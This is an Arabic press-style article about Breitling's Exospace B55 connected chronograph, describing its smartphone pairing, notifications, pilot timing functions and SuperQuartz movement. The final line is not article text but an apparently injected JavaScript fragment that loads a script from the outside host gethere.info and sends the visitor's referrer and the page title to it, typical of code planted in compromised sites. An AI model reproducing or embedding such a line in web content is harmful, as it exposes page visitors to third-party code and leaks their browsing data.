’بريتلينغ‘ تعيد ابتكار الساعة المتصلة مع طراز ’إكسوسبايس بي 55‘

اعتمدت ’بريتلينغ‘، الشركة السويسرية العريقة لتصنيع الساعات الفاخرة، على فلسفة جديدة في ابتكار أول ساعة كرونوغراف متصلة لديها بحيث وضعت الهاتف الذكي في خدمة الساعة بهدف تعزيز المزايا العملية للساعة وجعلها أكثر سهولة في الاستخدام. ومن خلال ساعة ’إكسوسبايس بي 55‘ (Exospace B55)، تعيد العلامة التجارية المتميّزة تأكيد موقعها كرائدة في مجال الإلكترونيات. وهذه الساعة المستقبلية قد تم تصميمها لصالح المحترفين بقطاع الطيران.

يُعدّ الأداء العالي فكرة مهيمنة لدى ’بريتلينغ‘ وهذا يظهر بشكل جلي في كل تطوّر تقني لديها. كما كان هذا الأمر المحفّز الأبرز للعلامة التجارية في تطوير ساعتها الكرونوغراف المتصلة الأولى. ولم يكن وارداً أبداً تحويل الساعة إلى امتداد للهاتف الذكي وتعتمد عليه وتكون أقل كفاءة من هذا الهاتف. وبالتالي فإن ساعة الكرونوغراف تبقى العنصر الأبرز لدى ’بريتلينغ‘ ويتمحور الربط بين الأداتين بشكل أساسي حول تعزيز المهام والوظائف.

تسهم عملية الترابط باتجاهين في تمكين الساعة والهاتف الذكي من تشكيل زوج متكامل مع بعضه بحيث يتم استخدام كل عنصر لما يقوم به بأفضل شكل. وبما أن المزايا الأبرز للهاتف الذكي هي شاشته وواجهته التفاعلية المتناغمة مع طريقة عمل الإنسان، فإن مالكي ساعة ’إكسوسبايس بي 55‘ يمكنهم استخدام هاتفهم لإجراء بعض التعديلات (ضبط الوقت، تحديد المناطق الزمنية، ضبط المنبّهات، اختيار أسلوب العرض، تحديد المعامل المتغيّرة في التشغيل واعتماد الوضعية الليلية)، والنتيجة هي استفادة كبيرة من ناحية الراحة والفعالية. وبشكل معاكس، يمكن للمستخدم إجراء عملية تحميل من الساعة إلى الهاتف الذكي لمختلف نتائج القياس (أوقات الطيران، الأوقات المسجّلة والأوقات الفاصلة، أوقات الدورات، إلخ.) وذلك للتمكّن من قراءتها بسهولة أكثر وتخزينها أو تناقلها.

وبالتالي فإن نظام الساعة المتصل الجديد الذي تم ابتكاره من قِبَل ’بريتلينغ‘ يسهّل استخدام وظائف ساعة الكرونوغراف بالتناغم مع روحية الساعات الحقيقية للمحترفين. وبكونها تشكّل رفيقاً حقيقياً مدى الحياة، فإن ساعة الكرونوغراف ’إكسوسبايس بي 55‘ متعدّدة الوظائف تتلقّى تنبيهات عن وصول بريد إلكتروني إلى الهاتف الذكي، وورود الرسائل (نصّية قصيرة أو عبر تطبيق WhatsApp) أو المكالمات الهاتفية (مع اسم ورقم المتصل) إضافة إلى التنبيه حول المواعيد المقبلة.

الساعة الأمثل للطيّار

هذه الساعة الكرونوغراف للجيل المقبل تتميّز بتصميمها التقني جداً وهي تتمتّع بإطار صلب وخفيف من التيتانيوم ومزوّدة بقرص دوّار يشتمل على عروات ملحقة ورباط حصري من نوع ’توينبرو‘ (TwinPro) بلونين من المطّاط. وهذا الجمع من الابتكارات يشتمل على نظام حركة حصري من نوع ’كاليبر بي 55‘ (Caliber B55) مع عرض للوقت بالأذرع وبأسلوب رقمي، إضافة إلى توافر باقة من الوظائف المصمّمة بشكل خاص للطيّارين، ومن ضمنها المقياس الإلكتروني لسرعة الطيران، جهاز كرونوغراف يسجّل حتى 50 وقتاً منفصلاً ونظام عد تنازلي/تصاعدي يفيد في إجراء سلسلة من عمليات العد التنازلي والتوقيت. وتقوم أداة كرونوغراف مخصّصة للطيران بتسجيل الوقت الذي تستغرقه الطائرة بين لحظة السير نحو نقطة الإقلاع وصولاً إلى نقطة التوقّف الأخيرة في نهاية المهمّة، إضافة إلى تسجيل أوقات الطلعات الجوية، بينما تحفظ تواريخ ومواقيت المغادرة، وأوقات الوصول، إلى جانب أوقات الإقلاع والهبوط (ميّزتي Block and Flight Times).

وتم تعزيز سهولة الاستخدام من خلال وضعية تحكّم بسيطة ومنطقية تشمل عملية اختيار الوظائف عبر تحريك التاج، والتشغيل/إيقاف التشغيل عبر زرين يعملان بالضغط عليهما. وتتميّز شاشتا LCD الواضحتين جداً بنظام إنارة خلفية يمكن تشغيله بمجرّد الضغط على التاج – أو عندما يقوم المستخدم بإمالة معصمه بزاوية تزيد عن 35 درجة (ميّزة الإمالة) – وهذا الأمر يُعدّ مهمّاً جداً عندما تكون اليد ممسكة بأدوات التحكّم بالطائرة أو عجلة القيادة. وتحصل الساعة على الطاقة من نظام بطارية قابل لإعادة الشحن والمتمثّل بنظام ’بريتلينغ كاليبر بي 55‘ (Breitling Caliber B55) الحصري، وهو عبارة عن نظام حركة ’سوبركوارتز‘ (SuperQuartzTM) بدقّة 10 مرّات أكثر من نظام الكوارتز العادي، وقد تمت المصادقة عليه من المعهد السويسري الرسمي لاختبار كرونومتر الساعات‘ (COSC).

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;